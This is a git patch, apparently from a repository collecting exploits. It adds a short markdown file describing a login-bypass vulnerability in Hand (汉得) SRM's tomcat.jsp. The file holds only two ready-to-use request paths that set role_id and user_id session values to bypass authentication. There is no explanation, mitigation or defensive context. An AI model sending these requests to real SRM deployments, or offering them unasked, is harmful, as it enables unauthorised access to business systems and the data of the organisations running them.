From ccadd6415ca0e0173cfe9182a635333e7005c8d1 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:20:12 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B1=89=E5=BE=97SRM=20tomcat.jsp=20?= =?UTF-8?q?=E7=99=BB=E5=BD=95=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 汉得SRM tomcat.jsp 登录绕过漏洞.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 汉得SRM tomcat.jsp 登录绕过漏洞.md diff --git a/汉得SRM tomcat.jsp 登录绕过漏洞.md b/汉得SRM tomcat.jsp 登录绕过漏洞.md new file mode 100644 index 0000000..0c2e5ca --- /dev/null +++ b/汉得SRM tomcat.jsp 登录绕过漏洞.md @@ -0,0 +1,5 @@ +## 汉得SRM tomcat.jsp 登录绕过漏洞 +``` +/tomcat.jsp?dataName=role_id&dataValue=1 +/tomcat.jsp?dataName=user_id&dataValue=1 +```